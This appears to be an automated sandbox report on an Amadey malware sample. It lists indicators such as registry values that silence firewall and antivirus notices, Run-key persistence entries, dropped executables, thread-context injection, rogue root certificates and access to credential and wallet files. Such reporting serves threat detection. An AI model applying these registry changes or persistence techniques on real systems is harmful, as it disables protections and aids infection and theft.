amadey | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	96513172.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	3006430217.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	3006430217.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	3006430217.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	96513172.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	96513172.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	96513172.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	3006430217.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	3006430217.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	3006430217.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	96513172.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	96513172.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	twztl.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral3/files/0x0003000000000747-672.dat	family_asyncrat

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5456	netsh.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	u1w0.1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	u1w0.0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	JJDHIDBFBF.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	FUCKER.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	ISetup3.exe

Executes dropped EXE 34 IoCs

pid	Process
1684	bd2.exe
4632	cp.exe
3444	lumma2.exe
1104	s1.exe
3844	twztl.exe
2448	ISetup3.exe
404	u1w0.0.exe
3124	u1w0.1.exe
1188	96513172.exe
5124	momsstiflersdgjboigfnbio.exe
5480	3006430217.exe
5892	3276515002.exe
6132	vmtoolsd.exe
5448	vmtoolsd.exe
5452	MSI.CentralServer.exe
5756	2595526574.exe
3956	PresentationFontCache.exe
5820	248483651.exe
4268	PresentationFontCache.exe
6104	crypted_15a94542.exe
5224	flt_shovemydiscoupyourarse.exe
1392	JJDHIDBFBF.exe
5292	2476721870.exe
3124	192706194.exe
4736	2837029563.exe
5156	test2.exe
5388	jokerpos.exe
5488	2.3.1.1.exe
5612	asyns.exe
2400	bin.exe
464	Dolzkqnsbh.exe
5092	d21cbe21e38b385a41a68c5e6dd32f4c.exe
6092	Creal.exe
2220	Creal.exe

Loads dropped DLL 64 IoCs

pid	Process
404	u1w0.0.exe
404	u1w0.0.exe
6132	vmtoolsd.exe
6132	vmtoolsd.exe
6132	vmtoolsd.exe
6132	vmtoolsd.exe
6132	vmtoolsd.exe
6132	vmtoolsd.exe
6132	vmtoolsd.exe
5448	vmtoolsd.exe
5448	vmtoolsd.exe
5448	vmtoolsd.exe
5448	vmtoolsd.exe
5448	vmtoolsd.exe
5448	vmtoolsd.exe
5448	vmtoolsd.exe
4268	PresentationFontCache.exe
4268	PresentationFontCache.exe
4268	PresentationFontCache.exe
4268	PresentationFontCache.exe
4268	PresentationFontCache.exe
4268	PresentationFontCache.exe
4268	PresentationFontCache.exe
4268	PresentationFontCache.exe
4268	PresentationFontCache.exe
4268	PresentationFontCache.exe
4268	PresentationFontCache.exe
4268	PresentationFontCache.exe
4268	PresentationFontCache.exe
4268	PresentationFontCache.exe
4268	PresentationFontCache.exe
4268	PresentationFontCache.exe
4268	PresentationFontCache.exe
4268	PresentationFontCache.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe
2220	Creal.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Windows security modification 2 TTPs 21 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	96513172.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	96513172.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	3006430217.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	96513172.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	96513172.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	3006430217.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	3006430217.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	3006430217.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	3006430217.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	96513172.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	96513172.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	96513172.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	3006430217.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	twztl.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	3006430217.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\winpsdrvnas.exe"	twztl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\syspplsvc.exe"	96513172.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\syspplsvc.exe"	96513172.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Windows\\winakrosvsa.exe"	3006430217.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Service = "C:\\Users\\Admin\\winakrosvsa.exe"	3006430217.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winpsdrvnas.exe"	twztl.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 42 IoCs

Web Service

T1102

flow	ioc
31	raw.githubusercontent.com
190	raw.githubusercontent.com
275	raw.githubusercontent.com
404	raw.githubusercontent.com
155	raw.githubusercontent.com
191	raw.githubusercontent.com
205	raw.githubusercontent.com
226	raw.githubusercontent.com
307	raw.githubusercontent.com
403	raw.githubusercontent.com
422	raw.githubusercontent.com
456	raw.githubusercontent.com
461	raw.githubusercontent.com
437	raw.githubusercontent.com
440	raw.githubusercontent.com
255	raw.githubusercontent.com
278	raw.githubusercontent.com
350	raw.githubusercontent.com
391	raw.githubusercontent.com
276	raw.githubusercontent.com
349	raw.githubusercontent.com
380	raw.githubusercontent.com
402	raw.githubusercontent.com
455	raw.githubusercontent.com
197	raw.githubusercontent.com
250	raw.githubusercontent.com
412	raw.githubusercontent.com
457	raw.githubusercontent.com
473	raw.githubusercontent.com
178	raw.githubusercontent.com
273	raw.githubusercontent.com
324	raw.githubusercontent.com
342	raw.githubusercontent.com
351	raw.githubusercontent.com
353	raw.githubusercontent.com
32	raw.githubusercontent.com
109	raw.githubusercontent.com
175	raw.githubusercontent.com
189	raw.githubusercontent.com
208	raw.githubusercontent.com
268	raw.githubusercontent.com
478	raw.githubusercontent.com

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 3444 set thread context of 3068	3444	lumma2.exe	107
PID 5448 set thread context of 3864	5448	vmtoolsd.exe	137
PID 6104 set thread context of 5244	6104	crypted_15a94542.exe	151
PID 3008 set thread context of 5032	3008	powershell.exe	157
PID 3864 set thread context of 5260	3864	cmd.exe	163
PID 5388 set thread context of 3476	5388	jokerpos.exe	170

Drops file in Windows directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\winpsdrvnas.exe	twztl.exe
File created	C:\Windows\syspplsvc.exe	96513172.exe
File opened for modification	C:\Windows\syspplsvc.exe	96513172.exe
File created	C:\Windows\Tasks\MSI.CentralServer.job	cp.exe
File created	C:\Windows\winakrosvsa.exe	3006430217.exe
File opened for modification	C:\Windows\winakrosvsa.exe	3006430217.exe
File created	C:\Windows\winpsdrvnas.exe	twztl.exe

Detects Pyinstaller 2 IoCs

pyinstaller

resource	yara_rule
behavioral3/files/0x0007000000023295-461.dat	pyinstaller
behavioral3/files/0x00050000000163e4-2176.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
2420	2448	WerFault.exe	108
5144	404	WerFault.exe	113
5436	5032	WerFault.exe	157
4420	5508	WerFault.exe	189

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1w0.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1w0.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1w0.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u1w0.0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u1w0.0.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
1892	schtasks.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
2060	tasklist.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	momsstiflersdgjboigfnbio.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	momsstiflersdgjboigfnbio.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	momsstiflersdgjboigfnbio.exe
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\78E50262E8C47571FB82D5063A6C9BD91BB8A325	momsstiflersdgjboigfnbio.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\78E50262E8C47571FB82D5063A6C9BD91BB8A325\Blob = 03000000010000001400000078e50262e8c47571fb82d5063a6c9bd91bb8a325140000000100000014000000ef4c0092a6fb762e5e95e2c95f871b19d54de2d904000000010000001000000003f6e71fa4328959fc11dbda6e2594a00f0000000100000030000000effb32d2d626fdd3cedd8f30be7db5bedc8f636cb1eb2b41256bf77805094c42d35fa47f4ec6029a846c8ccb1c691438190000000100000010000000dfd7f624560e51db4e9ed98d584f0a405c0000000100000004000000000c0000180000000100000010000000ea6089055218053dd01e37e1d806eedf4b0000000100000044000000300037004300450046003200460036003500340045003300450044003600300035003000460046004300390042003600450042003800340034003200350030005f00000020000000010000004e0600003082064a30820432a003020102021100835b7615206d2d6e097e0b6e409fefc0300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3232313131363030303030305a170d3332313131353233353935395a3044310b300906035504061302555331123010060355040a1309496e7465726e6574323121301f06035504031318496e436f6d6d6f6e20525341205365727665722043412032308201a2300d06092a864886f70d01010105000382018f003082018a028201810089f05cc438bad03457af9755a0f42243fc3e18113adb6d7a52210631d6d4b7b7928886858ff899ff1885a29d2b5ae1f8042149de44af405f9a22112c3a7b9747a995892a54c79dc733902923314855b7781aa63ab60c1a3f3bbf5d123fe039b3fa1a0b5bf8bfcc3d7d897bd2f79a9f354f2a3fbff7fd449fdbf54d494366b8c2a5691830928bae7b4bac89d60aed5f16df37bead316f591d89b5628d4c89dc372583dc6855cbfec6d3d3f04c0bbb874aaa4724e41132dffb3ec55ad73c735d9ff927ef98a1ca155a8aa4d3ed80c92bc2ac1a3a038e0f8434d008a1553f94cc9e8c9a134f1a0fbf5dfd016af9972821834efe6ecd078e743df9a3f670d7a5780b8278b688f558b63b864561af3286f945898929fc1efddd5138f87649de241350ad47dc21f4c7577802b4ac179f57979abc611feb56bbd455c2c0de8111b4b36f0e31d55e3b096366f62b5234689aeb4d3b91b3ca7bde5712550a7dc26e7eda7382fee6fc0f360b34e0374e006ccd61d1b9b7aaf2c983e8b122c7d81f2a0cdcf10203010001a38201703082016c301f0603551d230418301680145379bf5aaa2b4acf5480e1d89bc09df2b20366cb301d0603551d0e04160414ef4c0092a6fb762e5e95e2c95f871b19d54de2d9300e0603551d0f0101ff04040302018630120603551d130101ff040830060101ff020100301d0603551d250416301406082b0601050507030106082b0601050507030230220603551d20041b3019300d060b2b06010401b231010202673008060667810c01020230500603551d1f044930473045a043a041863f687474703a2f2f63726c2e7573657274727573742e636f6d2f55534552547275737452534143657274696669636174696f6e417574686f726974792e63726c307106082b0601050507010104653063303a06082b06010505073002862e687474703a2f2f6372742e7573657274727573742e636f6d2f55534552547275737452534141414143412e637274302506082b060105050730018619687474703a2f2f6f6373702e7573657274727573742e636f6d300d06092a864886f70d01010c0500038202010026800d34e41eae22beaf3ea6e284f9c6b725b1f7db2fa875c26a82acc3b6ce5b82c6a906cc11632a639972de975d50d94eb0af24a57652230510d9f0087c34eb3ce40e8c28940b694f6a1f34721bac365104f3470c76b1e637d0c92cdd97487bdae3b39ac46258883a1f43c32f305132715f39987ff0351a4a78249a74c48842551d60092397e495bad7ce64c22776e366ec2e6d2f09004003fad0831bcba48b59842f544bfaf7de582d5ff7181730788c639df97b36b04014946caef20acba2162192058dea1ab2a0574ea66ae5f32bbb092195ee099541ff6f8b05410c82a6fb6ccb0e8fe7851924f3103405bd41a8fcf26cf112495878cb9ad9e5bcc1e0ba3660dd3ad4757df870e79c80c17df34889c00276fe091b219fa5b4bac6c8b7502375e72a5a1b8dcf26a4345270500ee47ad22a3502979236462191a1d0f5393fd02e00f84337316fca16e539dde1cb5655fdb2cd621b60097d592d699da5fd26d8ee9cbc25460c90bfe3a990518cd903eacaec9a927abad50c98096dee6d7e7135fcebf54405ce43a7d55fb83ea135b34a0d283b631c8455a06a044b4de5da698f8c52882aece8bc4b1e7368deb1bc54945f35541d8056cc6fb74e201a24925cdf994ebd952d24832cf6999309996d86fe184475d74958787715c2e2d8c69e622395445acb1ed26f5c475fd9a11a6742ce6f65e8df33ba049be35e576fdb0a0d	momsstiflersdgjboigfnbio.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4664	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
404	u1w0.0.exe
404	u1w0.0.exe
404	u1w0.0.exe
404	u1w0.0.exe
404	u1w0.0.exe
404	u1w0.0.exe
404	u1w0.0.exe
404	u1w0.0.exe
404	u1w0.0.exe
404	u1w0.0.exe
404	u1w0.0.exe
404	u1w0.0.exe
404	u1w0.0.exe
404	u1w0.0.exe
3008	powershell.exe
3008	powershell.exe
3008	powershell.exe
5124	momsstiflersdgjboigfnbio.exe
5124	momsstiflersdgjboigfnbio.exe
5124	momsstiflersdgjboigfnbio.exe
6132	vmtoolsd.exe
5448	vmtoolsd.exe
5448	vmtoolsd.exe
5448	vmtoolsd.exe
404	u1w0.0.exe
404	u1w0.0.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3008	powershell.exe
3008	powershell.exe
3008	powershell.exe
3008	powershell.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
3864	cmd.exe
3864	cmd.exe
3864	cmd.exe
3864	cmd.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
6076	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
